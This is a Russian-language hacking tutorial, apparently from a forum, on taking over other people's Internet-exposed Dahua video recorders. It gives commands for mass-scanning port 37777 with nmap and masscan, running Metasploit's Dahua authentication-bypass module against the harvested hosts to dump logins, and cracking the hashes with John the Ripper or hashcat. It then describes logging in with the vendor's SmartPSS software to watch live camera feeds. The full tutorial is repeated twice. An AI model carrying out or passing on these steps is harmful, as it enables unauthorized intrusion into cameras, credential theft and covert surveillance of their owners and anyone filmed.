Сегодня я вам поведаю как подчинить под свой контроль регистраторы фирмы DAHUA.
Для начала нам нужны след. иснтрументы.
+ nmap
+ metasploit
+ john the ripper
+ Dahua SmartPSS (скачать можно с офф.сайта)
Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80.
80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81)
37777 порт для проприетарного софта.
Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080)
Итак запускаем nmap\masscan для поиска.
команда для нмапа следующая:
root@kali: nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt
если у вас есть список ИПов в стандарте CIRD
если по религиозным убеждениям используете масскан тогда печатайте так...
root@kali: masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt
можно сканировать из внешнего файла
root@kali: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt
для масскана аналогично
root@kali: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt
После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух.
root@kali: cat 37777.txt | sort | uniq > 37777_clear.txt
Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт.
root@kali: service postgresql start
root@kali: msfconsole
root@kali: use auxiliary/scanner/misc/dahua_dvr_auth_bypass
дальше сканер нужно настроить....
root@kali: set ACTION USER
root@kali: set THREADS 25
теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку
root@kali: set RHOSTS file:37777_clear.txt
ждём....
После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл.
Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" )
(Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)
root@kali: hashcat -m 0 -a 0 hash.txt -o cracked[.]txt /home/wordlist.txt
Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки.
допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону.
root@kali: john hash.txt
Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все)
После удачного брута проверяем пароли...
root@kali: john hash.txt --show
После того как мы подобрали пасс можно поступить двумя способами...
Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ...
Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS.
сцыль "http://ru.dahuasecurity.com/ru/download_2.html"
я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225"
Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности)
Ставим галку сохранить пароль и больше он запрашивается не будет.


Далее идём во вкладку HOME PAGE -> DEVICES

Жмём ADD, и указываем необходимые данные и жмём еще раз ADD.

Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа...

Пруф )
Для начала нам нужны след. иснтрументы.
+ nmap
+ metasploit
+ john the ripper
+ Dahua SmartPSS (скачать можно с офф.сайта)
Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80.
80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81)
37777 порт для проприетарного софта.
Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080)
Итак запускаем nmap\masscan для поиска.
команда для нмапа следующая:
root@kali: nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt
если у вас есть список ИПов в стандарте CIRD
если по религиозным убеждениям используете масскан тогда печатайте так...
root@kali: masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt
можно сканировать из внешнего файла
root@kali: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt
для масскана аналогично
root@kali: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt
После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух.
root@kali: cat 37777.txt | sort | uniq > 37777_clear.txt
Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт.
root@kali: service postgresql start
root@kali: msfconsole
root@kali: use auxiliary/scanner/misc/dahua_dvr_auth_bypass
дальше сканер нужно настроить....
root@kali: set ACTION USER
root@kali: set THREADS 25
теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку
root@kali: set RHOSTS file:37777_clear.txt
ждём....
После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл.
Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" )
(Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)
root@kali: hashcat -m 0 -a 0 hash.txt -o cracked[.]txt /home/wordlist.txt
Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки.
допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону.
root@kali: john hash.txt
Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все)
После удачного брута проверяем пароли...
root@kali: john hash.txt --show
После того как мы подобрали пасс можно поступить двумя способами...
Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ...
Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS.
сцыль "http://ru.dahuasecurity.com/ru/download_2.html"
я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225"
Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности)
Ставим галку сохранить пароль и больше он запрашивается не будет.


Далее идём во вкладку HOME PAGE -> DEVICES

Жмём ADD, и указываем необходимые данные и жмём еще раз ADD.

Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа...

Пруф )